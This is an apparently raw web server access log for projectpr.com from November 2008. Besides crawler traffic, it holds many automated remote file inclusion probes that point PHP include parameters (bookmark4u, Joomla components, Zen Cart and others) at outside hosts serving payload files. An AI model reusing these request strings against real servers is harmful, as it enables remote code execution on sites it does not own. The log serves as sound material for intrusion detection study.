74.6.17.157 - - [11/Nov/2008:18:52:30 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
88.198.54.67 - - [11/Nov/2008:18:52:35 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
88.198.54.67 - - [11/Nov/2008:18:52:35 -0800] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
88.198.54.67 - - [11/Nov/2008:18:52:36 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
74.6.17.157 - - [11/Nov/2008:18:52:47 -0800] "GET /clipart/?M=A HTTP/1.0" 200 1197 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
114.141.2.7 - - [11/Nov/2008:18:53:21 -0800] "GET /logs/access.log//fas/awstats/data/awstats062008.fas-al%20...//bookmark4u/lostpasswd.php=http://guitar3.com/finance7/bbs/data/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.projectpr.com"
114.141.2.7 - - [11/Nov/2008:18:53:21 -0800] "GET /fas/awstats/data/awstats062008.fas-al%20...//bookmark4u/lostpasswd.php=http://guitar3.com/finance7/bbs/data/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.projectpr.com"
114.141.2.7 - - [11/Nov/2008:18:53:21 -0800] "GET /logs//fas/awstats/data/awstats062008.fas-al%20...//bookmark4u/lostpasswd.php=http://guitar3.com/finance7/bbs/data/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.projectpr.com"
114.141.2.7 - - [11/Nov/2008:18:53:30 -0800] "GET /logs/access.log//fas/awstats/data/awstats062008.fas-al%20...//bookmark4u/lostpasswd.php=http://guitar3.com/finance7/bbs/data/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.projectpr.com"
114.141.2.7 - - [11/Nov/2008:18:53:30 -0800] "GET /logs//fas/awstats/data/awstats062008.fas-al%20...//bookmark4u/lostpasswd.php=http://guitar3.com/finance7/bbs/data/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.projectpr.com"
114.141.2.7 - - [11/Nov/2008:18:53:30 -0800] "GET /fas/awstats/data/awstats062008.fas-al%20...//bookmark4u/lostpasswd.php=http://guitar3.com/finance7/bbs/data/temp/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.projectpr.com"
74.6.17.157 - - [11/Nov/2008:18:55:43 -0800] "GET /logs/scripts.log HTTP/1.0" 200 262658 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
88.198.54.67 - - [11/Nov/2008:18:56:16 -0800] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
88.198.54.67 - - [11/Nov/2008:18:56:16 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
88.198.54.67 - - [11/Nov/2008:18:56:16 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
203.146.15.54 - - [11/Nov/2008:18:57:13 -0800] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
203.146.15.54 - - [11/Nov/2008:18:57:13 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
203.146.15.54 - - [11/Nov/2008:18:57:13 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
200.109.205.32 - - [11/Nov/2008:19:03:46 -0800] "GET /?path%5Bdocroot%5D=http://skill-station.net/editor/loco.me.gif?? HTTP/1.1" 200 10027 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.projectpr.com"
122.49.120.85 - - [11/Nov/2008:19:05:34 -0800] "GET /logs/index2.php?x=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "projectpr.com"
88.198.54.67 - - [11/Nov/2008:19:08:24 -0800] "GET /logs/access_080512.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "projectpr.com"
88.198.54.67 - - [11/Nov/2008:19:08:26 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "projectpr.com"
91.192.241.74 - - [11/Nov/2008:19:08:29 -0800] "GET /!scanhttp://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.projectpr.com"
91.192.241.74 - - [11/Nov/2008:19:08:55 -0800] "GET /!scanhttp://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
72.47.208.77 - - [11/Nov/2008:19:10:10 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.maria2007.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
72.47.208.77 - - [11/Nov/2008:19:10:10 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.maria2007.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
88.198.54.67 - - [11/Nov/2008:19:10:42 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
88.198.54.67 - - [11/Nov/2008:19:10:42 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
88.198.54.67 - - [11/Nov/2008:19:10:43 -0800] "GET /logs/access_080112.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
91.192.241.74 - - [11/Nov/2008:19:11:46 -0800] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
91.192.241.74 - - [11/Nov/2008:19:11:47 -0800] "GET /include/lib.inc.php?site_path=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
91.192.241.74 - - [11/Nov/2008:19:11:47 -0800] "GET /logs//include/lib.inc.php?site_path=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
91.192.241.74 - - [11/Nov/2008:19:12:00 -0800] "GET /!scanhttp://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
213.165.80.16 - - [11/Nov/2008:19:12:06 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
203.146.15.54 - - [11/Nov/2008:19:13:18 -0800] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.165.80.16 - - [11/Nov/2008:19:13:21 -0800] "GET /logs/access_070812.log//modules/xfsection/modify.php?dir_module=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.projectpr.com"
213.165.80.16 - - [11/Nov/2008:19:13:22 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.projectpr.com"
203.146.15.54 - - [11/Nov/2008:19:13:26 -0800] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.165.80.16 - - [11/Nov/2008:19:14:25 -0800] "GET /logs/access_071112.log//modules/xfsection/modify.php?dir_module=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.projectpr.com"
88.198.54.67 - - [11/Nov/2008:19:14:25 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
88.198.54.67 - - [11/Nov/2008:19:14:26 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
213.165.80.16 - - [11/Nov/2008:19:14:45 -0800] "GET /logs/access_071112.log//modules/xfsection/modify.php?dir_module=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.165.80.16 - - [11/Nov/2008:19:14:46 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.165.80.16 - - [11/Nov/2008:19:14:46 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
200.109.205.32 - - [11/Nov/2008:19:14:52 -0800] "GET /logs/access_070912.log//?path%5Bdocroot%5D=http://skill-station.net/editor/loco.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.projectpr.com"
72.30.142.161 - - [11/Nov/2008:19:15:09 -0800] "GET /SlurpConfirm404/obje-ang/FatherTime/alp.htm HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
213.165.80.16 - - [11/Nov/2008:19:15:23 -0800] "GET /logs/access_070812.log//modules/xfsection/modify.php?dir_module=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
72.30.142.161 - - [11/Nov/2008:19:15:31 -0800] "GET /SlurpConfirm404/obje-ang/FatherTime/alp.htm HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
88.198.54.67 - - [11/Nov/2008:19:15:53 -0800] "GET /logs/access_080512.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "projectpr.com"
88.198.54.67 - - [11/Nov/2008:19:15:54 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "projectpr.com"
88.198.54.67 - - [11/Nov/2008:19:15:54 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "projectpr.com"
88.198.54.67 - - [11/Nov/2008:19:18:08 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
88.198.54.67 - - [11/Nov/2008:19:18:08 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
88.198.54.67 - - [11/Nov/2008:19:18:09 -0800] "GET /logs/access_080112.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
203.146.15.54 - - [11/Nov/2008:19:18:37 -0800] "GET /logs/access_080512.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "projectpr.com"
203.146.15.54 - - [11/Nov/2008:19:18:37 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "projectpr.com"
203.146.15.54 - - [11/Nov/2008:19:18:37 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "projectpr.com"
91.192.241.74 - - [11/Nov/2008:19:19:53 -0800] "GET /logs/scripts.log//include/bbs.lib.inc.php?site_path=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
91.192.241.74 - - [11/Nov/2008:19:19:54 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
91.192.241.74 - - [11/Nov/2008:19:19:54 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
203.146.15.54 - - [11/Nov/2008:19:20:26 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
203.146.15.54 - - [11/Nov/2008:19:20:26 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
203.146.15.54 - - [11/Nov/2008:19:20:26 -0800] "GET /logs/access_080112.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
203.146.15.54 - - [11/Nov/2008:19:20:41 -0800] "GET /skin/zero_vote/error.php?dir=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
203.146.15.54 - - [11/Nov/2008:19:20:41 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
203.146.15.54 - - [11/Nov/2008:19:20:41 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
91.192.241.74 - - [11/Nov/2008:19:20:49 -0800] "GET /logs/access_071012.log/!scanhttp://www.bsthank.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
88.198.54.67 - - [11/Nov/2008:19:21:28 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
88.198.54.67 - - [11/Nov/2008:19:21:29 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
88.198.54.67 - - [11/Nov/2008:19:21:29 -0800] "GET /skin/zero_vote/error.php?dir=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
72.30.142.161 - - [11/Nov/2008:19:23:31 -0800] "GET /SlurpConfirm404/gites/theurors.htm HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
72.30.142.161 - - [11/Nov/2008:19:23:43 -0800] "GET /SlurpConfirm404/gites/theurors.htm HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
202.144.158.163 - - [11/Nov/2008:19:23:56 -0800] "GET /logs/access_071012.log/index2.php?x=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
202.144.158.163 - - [11/Nov/2008:19:23:58 -0800] "GET /index2.php?x=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
202.144.158.163 - - [11/Nov/2008:19:23:59 -0800] "GET /logs/index2.php?x=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
202.144.158.163 - - [11/Nov/2008:19:25:11 -0800] "GET /logs/access_071012.log/index2.php?x=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
202.144.158.163 - - [11/Nov/2008:19:25:12 -0800] "GET /index2.php?x=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
202.144.158.163 - - [11/Nov/2008:19:25:14 -0800] "GET /logs/index2.php?x=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.165.80.16 - - [11/Nov/2008:19:27:20 -0800] "GET /logs/access.log/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.165.80.16 - - [11/Nov/2008:19:27:20 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.165.80.16 - - [11/Nov/2008:19:27:20 -0800] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
74.62.161.78 - - [11/Nov/2008:19:29:25 -0800] "GET /services.html HTTP/1.0" 200 11878 "-" "flatlandbot/baypup (Flatland Industries Web Spider; http://www.flatlandindustries.com/flatlandbot; jason@flatlandindustries.com)" "www.projectpr.com"
91.184.4.157 - - [11/Nov/2008:19:31:23 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "projectpr.com"
91.184.4.157 - - [11/Nov/2008:19:31:24 -0800] "GET /logs/access_080512.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "projectpr.com"
91.184.4.157 - - [11/Nov/2008:19:31:24 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "projectpr.com"
70.38.54.118 - - [11/Nov/2008:19:31:48 -0800] "GET /logs/access_080512.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "projectpr.com"
70.38.54.118 - - [11/Nov/2008:19:31:48 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "projectpr.com"
70.38.54.118 - - [11/Nov/2008:19:31:48 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.mfa.gov.bt/kethek-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "projectpr.com"
70.38.54.118 - - [11/Nov/2008:19:31:50 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "projectpr.com"
70.38.54.118 - - [11/Nov/2008:19:31:51 -0800] "GET /logs/access_080512.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "projectpr.com"
70.38.54.118 - - [11/Nov/2008:19:31:51 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "projectpr.com"
70.85.149.242 - - [11/Nov/2008:19:31:51 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "projectpr.com"
70.85.149.242 - - [11/Nov/2008:19:31:51 -0800] "GET /logs/access_080512.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "projectpr.com"
70.85.149.242 - - [11/Nov/2008:19:31:51 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "projectpr.com"
59.125.183.76 - - [11/Nov/2008:19:37:20 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ccis.ir/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.projectpr.com"
59.125.183.76 - - [11/Nov/2008:19:37:20 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ccis.ir/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.projectpr.com"
59.125.183.76 - - [11/Nov/2008:19:39:34 -0800] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.ccis.ir/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.projectpr.com"
59.125.183.76 - - [11/Nov/2008:19:39:34 -0800] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.ccis.ir/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.projectpr.com"
74.62.161.78 - - [11/Nov/2008:19:45:29 -0800] "GET /aboutus.html HTTP/1.0" 200 8070 "-" "flatlandbot/baypup (Flatland Industries Web Spider; http://www.flatlandindustries.com/flatlandbot; jason@flatlandindustries.com)" "www.projectpr.com"
72.30.142.82 - - [11/Nov/2008:19:45:41 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
72.30.142.82 - - [11/Nov/2008:19:45:54 -0800] "GET /SlurpConfirm404/hollie.htm HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
72.30.142.82 - - [11/Nov/2008:19:46:05 -0800] "GET /SlurpConfirm404/hollie.htm HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
65.95.57.25 - - [11/Nov/2008:19:47:15 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ccis.ir/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.projectpr.com"
65.95.57.25 - - [11/Nov/2008:19:47:15 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.ccis.ir/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.projectpr.com"
91.192.241.74 - - [11/Nov/2008:19:52:50 -0800] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
91.192.241.74 - - [11/Nov/2008:19:52:51 -0800] "GET /include/lib.inc.php?site_path=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
91.192.241.74 - - [11/Nov/2008:19:52:51 -0800] "GET /logs//include/lib.inc.php?site_path=http://www.samilglass.com/images/bratid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
189.103.65.167 - - [11/Nov/2008:19:53:02 -0800] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.hempstylemito.xpg.com.br/fodase/id1scambom.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
